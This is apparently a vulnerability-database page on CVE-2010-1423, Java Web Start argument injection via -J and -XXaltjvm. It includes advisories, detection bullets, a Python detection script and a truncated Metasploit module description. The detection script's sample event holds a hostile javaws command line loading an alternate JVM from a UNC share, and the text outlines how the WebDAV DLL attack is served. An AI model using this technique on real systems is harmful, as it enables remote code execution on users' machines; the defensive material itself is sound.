CVE-2010-1423
Published: 2010-04-15
Priority: P268, critical, 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 55.58% (98.9th percentile)
Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versions, when running on Windows and possibly on Linux, allows remote attackers to execute arbitrary code via the (1) -J or (2) -XXaltjvm argument to javaws.exe, which is processed by the launch method. NOTE: some of these details are obtained from third party information.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | jdk | <= 1.6.0 | — |
| oracle | jdk | — | — |
| oracle | jre | <= 1.6.0 | — |
| oracle | jre | — | — |
Detection & IOCs
- Detect invocation of javaws.exe with -J or -XXaltjvm arguments, which are the core injection vectors for this vulnerability.
- Monitor for browser processes spawning javaws.exe with UNC paths (\\host\share) passed via -XXaltjvm, indicating WebDAV-based DLL injection.
- Detect instantiation of Java Deployment Toolkit ActiveX (CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA) or NPAPI plugin (application/npruntime-scriptable-plugin;deploymenttoolkit) calling the launch() method in browser context.
- The exploit module requires SRVPORT=80 and URIPATH=/ and uses WebDAV (OPTIONS/PROPFIND methods) to serve a malicious DLL; detect inbound WebDAV PROPFIND requests for .dll files from Windows hosts.
- Exploitation requires the target host to have the WebClient service (WebDAV Mini-Redirector) enabled; the attack will not succeed if this service is disabled.
- The Metasploit module must be run as root on a server that does not serve SMB, and requires SRVPORT=80 and URIPATH=/ for WebDAV to function.
- The vulnerability primarily affects Windows; Linux impact is uncertain per the advisory.
- All Java 6 versions since Update 10 are believed to be affected; the fix was delivered in Java 6 Update 20.
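The first two detection points above can be expressed as a check over process-creation telemetry. This is an added example, not a rule from any of the quoted sources; the event field names (image, parent_image, command_line), the browser list and the sample events are assumptions constructed for illustration.

```python
import ntpath
import re

# Assumed browser image names; extend for the environment being monitored.
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe", "opera.exe", "safari.exe"}
# -J<option> hands <option> to the Java runtime; ignore "-J" inside words/URLs.
J_OPTION = re.compile(r'(?<![\w-])-J\S+')
# -XXaltjvm, optionally capturing the path given after "=".
ALTJVM = re.compile(r'-XXaltjvm(?:="?([^\s"]+))?', re.IGNORECASE)

def _exe(path):
    """Lower-cased file name of a Windows path (works on any OS)."""
    return ntpath.basename(path or "").lower()

def check_event(event):
    """Return (severity, reasons) for a suspicious javaws launch, else None."""
    if _exe(event.get("image")) != "javaws.exe":
        return None
    cmd = event.get("command_line", "")
    reasons = []
    if J_OPTION.search(cmd):
        reasons.append("-J option passed to javaws")
    alt = ALTJVM.search(cmd)
    unc = False
    if alt:
        reasons.append("-XXaltjvm option passed to javaws")
        unc = (alt.group(1) or "").startswith("\\\\")
        if unc:
            reasons.append("alternate JVM path is a UNC share")
    if not reasons:
        return None
    from_browser = _exe(event.get("parent_image")) in BROWSERS
    if from_browser:
        reasons.append("spawned by a browser process")
    # -J alone can be administrative use; browser parent or UNC path raises it.
    return ("high" if from_browser or unc else "medium"), reasons

JAVAWS = r"C:\Program Files\Java\jre6\bin\javaws.exe"
IEXPLORE = r"C:\Program Files\Internet Explorer\iexplore.exe"
# Constructed sample events (placeholder hosts), not captured telemetry.
SAMPLE_EVENTS = [
    {"image": JAVAWS, "parent_image": IEXPLORE,
     "command_line": r"javaws.exe -J-XXaltjvm=\\fileserver.example\share http://app.example/a.jnlp"},
    {"image": JAVAWS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"javaws.exe -J-Xmx256m C:\apps\tool.jnlp"},
    {"image": JAVAWS, "parent_image": IEXPLORE,
     "command_line": r"javaws.exe http://app.example/a.jnlp"},
]

def scan(events):
    """Pair each flagged event's command line with its verdict."""
    return [(e["command_line"], v) for e in events if (v := check_event(e))]
```

On hosts patched to Java 6 Update 20 or later the same check still serves as a signal of attempted exploitation.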
CVSS provenance
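| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vendor_redhat | — | 9.3 | CRITICAL | — |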
GHSA
GHSA-563f-2v9h-x957: Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versio
ghsa_unreviewed·2022-05-02
CVE-2010-1423 [HIGH] CWE-78 GHSA-563f-2v9h-x957: Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versio
Red Hat
Java: Java Web Start arbitrary command line injection
vendor_redhat·2010-04-09·CVSS 9.3
CVE-2010-1423 [CRITICAL] Java: Java Web Start arbitrary command line injection
No detection rules found.
Exploit-DB
Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)
exploitdb·2010-04-09
CVE-2010-1423 Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule 'Sun Java Web Start Plugin Command Line Argument Injection',
'Description' => %q{
This module exploits a flaw in the Web Start plugin component of Sun Java
Web Start. The arguments passed to Java Web Start are not properly validated.
By passing the lesser known -J option, an attacker can pass arbitrary options
directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed
by Ruben Santamarta, an attacker can execute arbitrary code in the context of
an unsuspecting browser user.
This vulnerability was originally discover
Metasploit
Sun Java Web Start Plugin Command Line Argument Injection
metasploit
This module exploits a flaw in the Web Start plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 "are believed to be affected by this vulnerability." In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, th
Bugzilla
CVE-2010-0886 CVE-2010-0887 Sun Java: Java Web Start arbitrary command line injection
bugzilla·2010-04-11·CVSS 10.0
CVE-2010-0886 [CRITICAL] CVE-2010-0886 CVE-2010-0887 Sun Java: Java Web Start arbitrary command line injection
Tavis Ormandy reported:
[1] http://seclists.org/fulldisclosure/2010/Apr/119
a deficiency in the way Java Deployment Toolkit's
Java Web Start sanitized URL of the applications, intended
to be launched and installed via the Java Networking
Launching Protocol. Remote attacker could trick a local
victim into visiting a specially-crafted web page, potentially
leading to execution of arbitrary Java code with the
privileges of the user opening the page.
References:
[2] http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1
[3] http://bugs.gentoo.org/show_bug.cgi?id=314531
CVE Request:
[4] http://www.openwall.com/lists/oss-security/2010/04/10/2
Discussion:
Sun never open sourced th
Zscaler
Incognito Exploit Kit | Zscaler
blogs_zscaler·2011-06-14
References
- http://lists.grok.org.uk/pipermail/full-disclosure/2010-April/074036.html
- http://osvdb.org/63648
- http://secunia.com/advisories/39260
- http://www.kb.cert.org/vuls/id/886582
- http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1
- http://www.securitytracker.com/id?1023840
- http://www.vupen.com/english/advisories/2010/0853
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57615
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14090